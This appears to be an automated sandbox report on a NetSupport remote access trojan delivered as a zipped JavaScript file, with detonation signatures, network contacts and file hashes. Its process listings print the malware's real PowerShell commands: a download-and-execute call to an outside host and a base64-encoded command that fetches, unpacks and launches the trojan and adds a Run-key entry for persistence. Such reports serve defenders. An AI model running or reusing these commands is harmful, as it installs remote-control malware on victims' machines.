Malware Analysis Report

2024-10-19 01:39

Sample ID 240208-rrm15sed7x
Target 08022024_2226_07022024_DCS7727723772772.zip
SHA256 26f21ada754233191d1980622136860a9f88723aa9254165e6eb0361817d856c
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

26f21ada754233191d1980622136860a9f88723aa9254165e6eb0361817d856c

Threat Level: Known bad

The file 08022024_2226_07022024_DCS7727723772772.zip was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-08 14:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-08 14:25

Reported

2024-02-08 14:28

Platform

win7-20231215-en

Max time kernel

120s

Max time network

124s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
CA 67.43.225.106:443 assime.ca tcp

Files

memory/2836-4-0x000000001B0F0000-0x000000001B3D2000-memory.dmp

memory/2836-5-0x0000000002590000-0x0000000002598000-memory.dmp

memory/2836-6-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2836-7-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-9-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-8-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

memory/2836-10-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-11-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-12-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-13-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2836-14-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-08 14:25

Reported

2024-02-08 14:28

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

158s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\DCS7727723772772.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco QwBoAEQASQByACAAJABlAE4AdgA6AEwATwBDAEEAbABhAHAAcABEAGEAVABhADsAIAAkAEcAMgBmAGYAdwAwAGMAPQBbAGIAeQB0AGUAWwBdAF0AQAAoADgAMAAsACAANwA1ACwAIAAzACwAIAA0ACkAOwAgACQAawBuAHMAUABVADIAQQA9ACcAaAB0AHQAcAA6AC8ALwBzAGEAawBhAGwAZQByAGEAbABvAC4AYwBvAG0ALwBjAGMAZQBhADIANgA4AGIALQA4ADcAMQA2AC0ANAA2AGIAZQAtADkAMQA0ADgALQAzAGUANgAxADQAYgAzADgAYQAwAGQAZgAuAHQAeAB0ACcAOwAgACQAMwBsAEsAYwBVAEgAWAA9ACcAagBHAGgAVAB5AG8AaQBDAC4AegBpAHAAJwA7ACAAJABYAEYAeABiADMAPQAnAG0AbwBkAGUAbQBfAGcAcAByAHMAXwBtAG8AZAB1AGwAZQBzACcAOwAgACQARABFAGYAZgBJAFMAPQBpAE4AVgBPAEsAZQAtAFcAZQBCAHIAZQBxAFUAZQBzAHQAIAAtAFUAcgBJACAAJABrAG4AcwBQAFUAMgBBACAALQBVAHMARQBiAEEAcwBJAEMAUABhAFIAUwBJAE4AZwA7ACAAJABCAG0ASgBOAGcANQBmAD0AJABEAEUAZgBmAEkAUwAuAGMAbwBuAFQAZQBOAHQAOwAgACQATgBUADYAVgBPAEUAPQAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEALAAgACQAWABGAHgAYgAzACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAYwBrAGEAdQA4AD0AIgAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEAXAAkADMAbABLAGMAVQBIAFgAIgA7ACAAJABQAHgASQBCAFgAcwBvAEYAPQBbAEMAbwBOAFYARQBSAHQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABTAFQAcgBpAE4ARwAoACQAQgBtAEoATgBnADUAZgApADsAIAAkAEgANQBMAHoAawBIAFQAPQAkAFAAeABJAEIAWABzAG8ARgAgAC0AUwBQAGwASQBUACAAJwAgACcAIAAtAEEAcwAgAFsAQgB5AHQARQBbAF0AXQA7ACAAJAAxAFkASwBnAHMAcwBuAD0AJABHADIAZgBmAHcAMABjACsAJABIADUATAB6AGsASABUADsAIABTAGMAIAAkADMAbABLAGMAVQBIAFgAIAAkADEAWQBLAGcAcwBzAG4AIAAtAEUATgBDAG8AZABpAE4AZwAgAEIAWQBUAGUAOwAgAEUAeABwAEEAbgBkAC0AQQBSAEMAaABJAHYAZQAgAC0AcABBAHQAaAAgACQAYwBrAGEAdQA4ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAE4AUABhAHQASAAgACQATgBUADYAVgBPAEUAIAAtAGYAbwBSAEMARQA7ACAAUgBJACAAJAAzAGwASwBjAFUASABYADsAIABDAEQAIAAkAE4AVAA2AFYATwBFADsAIAAkAFIAcQBQAHQAUQBkAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAE4AVAA2AFYATwBFADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAATgBlAHcALQBJAFQARQBtAFAAcgBPAFAARQByAHQAeQAgAC0AUABhAFQASAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAE0AZQAgACQAWABGAHgAYgAzACAALQBWAGEATABVAEUAIAAkAFIAcQBQAHQAUQBkACAALQBwAFIAbwBQAGUAcgBUAHkAVABZAFAARQAgACcAUwB0AHIAaQBuAGcAJwA7AA==

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 assime.ca udp
CA 67.43.225.106:443 assime.ca tcp
US 8.8.8.8:53 106.225.43.67.in-addr.arpa udp
US 8.8.8.8:53 sakaleralo.com udp
DE 192.121.22.184:80 sakaleralo.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 184.22.121.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 createcgroup.com udp
GB 5.61.62.93:443 createcgroup.com tcp
US 8.8.8.8:53 93.62.61.5.in-addr.arpa udp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 104.26.0.231:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 231.0.26.104.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 33.134.221.88.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

memory/1312-1-0x000001D0B5BC0000-0x000001D0B5BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kz3xi0kr.hnh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1312-10-0x00007FFC0A0C0000-0x00007FFC0AB81000-memory.dmp

memory/1312-11-0x000001D0B5C00000-0x000001D0B5C10000-memory.dmp

memory/1312-12-0x000001D0B5C00000-0x000001D0B5C10000-memory.dmp

memory/724-22-0x00007FFC0A0C0000-0x00007FFC0AB81000-memory.dmp

memory/724-24-0x0000019DF6DE0000-0x0000019DF6DF0000-memory.dmp

memory/724-23-0x0000019DF6DE0000-0x0000019DF6DF0000-memory.dmp

memory/724-25-0x0000019DF6DE0000-0x0000019DF6DF0000-memory.dmp

memory/724-27-0x0000019DF93D0000-0x0000019DF93E2000-memory.dmp

memory/724-28-0x0000019DF93C0000-0x0000019DF93CA000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe

MD5 a2b46c59f6e7e395d479b09464ecdba0
SHA1 92c132307dd21189b6d7912ddd934b50e50d1ec1
SHA256 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA512 4f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICL32.dll

MD5 916c03d8fc0c1fd211c254737dff1055
SHA1 948ee4fbae7ce9dc7a37ccaca75341876bbf5d70
SHA256 250e8bbec081ae5e65b669da92652af6d4266db816c8705fbc9be84707914d99
SHA512 ad18049763a0c289f80c0efa21fbe2a44d0d3f4b5f3686ed9be7562e5c9c68f932a8047377e3a5a8a2a6f09046bb12eadf8b6d3b99dfaa81650fa633ccee1050

C:\Users\Admin\AppData\Local\modem_gprs_modules\PCICAPI.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Local\modem_gprs_modules\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

memory/724-76-0x00007FFC0A0C0000-0x00007FFC0AB81000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 512c6cab650bfda6ef2995f6b515ed6f
SHA1 fec40abf4f5d74ea7f8828cee83770e423203083
SHA256 84871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512 638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 08f9f3eb63ff567d1ee2a25e9bbf18f0
SHA1 6bf06056d1bb14c183490caf950e29ac9d73643a
SHA256 82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512 425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

memory/1312-82-0x00007FFC0A0C0000-0x00007FFC0AB81000-memory.dmp

C:\Users\Admin\AppData\Local\modem_gprs_modules\NSM.LIC

MD5 866c96ba2823ac5fe70130dfaaa08531
SHA1 892a656da1ea264c73082da8c6e5f5728abcb861
SHA256 6a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA512 0dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112

C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.ini

MD5 2cd1a8115b7328756129052384e2eed6
SHA1 9458e9553d3d1f075ed09a06fda3f36136781704
SHA256 02ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512 df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455

C:\Users\Admin\AppData\Local\modem_gprs_modules\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c